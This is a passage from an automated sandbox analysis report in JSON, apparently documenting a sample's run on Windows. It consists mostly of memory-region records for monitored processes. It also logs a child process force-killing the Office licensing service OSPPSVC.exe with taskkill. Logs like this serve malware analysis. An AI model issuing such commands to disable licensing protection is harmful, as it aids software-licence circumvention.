"start_va": 524288, "timestamp": "00:01:30.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_3705", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:30.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_3706", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:30.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_3707", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:30.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 2883584, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3708", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 2883584, "timestamp": "00:01:30.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 8130559, "entry_point": 0, "filename": null, "id": "region_3709", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:01:30.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 8847359, "entry_point": 0, "filename": null, "id": "region_3710", "name": "private_0x0000000000830000", "norm_filename": null, "region_type": "private_memory", "start_va": 8585216, "timestamp": "00:01:30.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9830400, "type": "region", "version": 1 }, "end_va": 10092543, "entry_point": 0, "filename": null, "id": "region_3711", "name": "private_0x0000000000960000", "norm_filename": null, "region_type": "private_memory", "start_va": 9830400, "timestamp": "00:01:30.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10944512, "type": "region", "version": 1 }, "end_va": 11206655, "entry_point": 0, "filename": null, "id": "region_3712", "name": "private_0x0000000000a70000", "norm_filename": null, "region_type": "private_memory", "start_va": 10944512, "timestamp": "00:01:30.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 15335424, "type": "region", "version": 1 }, "end_va": 36306943, "entry_point": 0, "filename": null, "id": "region_3713", "name": "pagefile_0x0000000000ea0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 15335424, "timestamp": "00:01:30.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3714", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:30.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3715", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:30.027", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_3716", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:30.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1784348672, "type": "region", "version": 1 }, "end_va": 1784725503, "entry_point": 1784490824, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_3717", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1784348672, "timestamp": "00:01:30.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1785856000, "type": "region", "version": 1 }, "end_va": 1785896959, "entry_point": 1785861274, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_3718", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1785856000, "timestamp": "00:01:30.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 11206656, "type": "region", "version": 1 }, "end_va": 12255231, "entry_point": 0, "filename": null, "id": "region_3719", "name": "private_0x0000000000ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11206656, "timestamp": "00:01:30.035", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12910592, "type": "region", "version": 1 }, "end_va": 13172735, "entry_point": 0, "filename": null, "id": "region_3720", "name": "private_0x0000000000c50000", "norm_filename": null, "region_type": "private_memory", "start_va": 12910592, "timestamp": "00:01:30.035", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1784152064, "type": "region", "version": 1 }, "end_va": 1784319999, "entry_point": 1784179481, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_3721", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1784152064, "timestamp": "00:01:30.035", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8323072, "type": "region", "version": 1 }, "end_va": 8585215, "entry_point": 0, "filename": null, "id": "region_3722", "name": "private_0x00000000007f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8323072, "timestamp": "00:01:30.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 12845055, "entry_point": 0, "filename": null, "id": "region_3723", "name": "private_0x0000000000c00000", "norm_filename": null, "region_type": "private_memory", "start_va": 12582912, "timestamp": "00:01:30.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 36306944, "type": "region", "version": 1 }, "end_va": 39251967, "entry_point": 36306944, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3724", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 36306944, "timestamp": "00:01:30.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3725", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:30.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3726", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:30.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3727", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:30.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_3728", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:30.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9371648, "type": "region", "version": 1 }, "end_va": 9633791, "entry_point": 0, "filename": null, "id": "region_3729", "name": "private_0x00000000008f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9371648, "timestamp": "00:01:30.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 13631488, "type": "region", "version": 1 }, "end_va": 13893631, "entry_point": 0, "filename": null, "id": "region_3730", "name": "private_0x0000000000d00000", "norm_filename": null, "region_type": "private_memory", "start_va": 13631488, "timestamp": "00:01:30.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 14090240, "type": "region", "version": 1 }, "end_va": 14352383, "entry_point": 0, "filename": null, "id": "region_3731", "name": "private_0x0000000000d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 14090240, "timestamp": "00:01:30.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 14417920, "type": "region", "version": 1 }, "end_va": 14680063, "entry_point": 0, "filename": null, "id": "region_3732", "name": "private_0x0000000000dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 14417920, "timestamp": "00:01:30.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1785790464, "type": "region", "version": 1 }, "end_va": 1785851903, "entry_point": 1785799072, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_3733", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1785790464, "timestamp": "00:01:30.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3734", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:30.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3735", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:30.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1783365632, "type": "region", "version": 1 }, "end_va": 1783463935, "entry_point": 1783370549, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_3736", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1783365632, "timestamp": "00:01:30.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1783496704, "type": "region", "version": 1 }, "end_va": 1784111103, "entry_point": 1783625913, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_3737", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1783496704, "timestamp": "00:01:30.078", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM OSPPSVC.exe /IM OSPPSVC.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_30", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 30, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3738", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:30.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3739", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:30.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3740", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:30.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3741", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:30.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3742", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:30.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_3743", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:30.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_3744", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:30.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 9175040, "type": "region", "version": 1 }, "end_va": 9265151, "entry_point": 9198729, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_3745", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 9175040, "timestamp": "00:01:30.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3746", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:30.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3747", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:30.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3748", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:30.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3749", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:30.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3750", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:30.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3751", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:30.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3752", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:30.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3753", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:30.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3754", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:30.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_3755", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:01:30.311", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3756", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:30.311", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3757", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:30.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3758", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:30.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_3759", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:30.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_3760", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:30.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3761", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:30.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3762", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:30.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 983040, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3763", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:30.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_3764", "name": "private_0x00000000004d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5046272, "timestamp": "00:01:30.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 8060928, "type": "region", "version": 1 }, "end_va": 8126463, "entry_point": 0, "filename": null, "id": "region_3765", "name": "private_0x00000000007b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8060928, "timestamp": "00:01:30.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1783758848, "type": "region", "version": 1 }, "end_va": 1784721407, "entry_point": 1783763918, 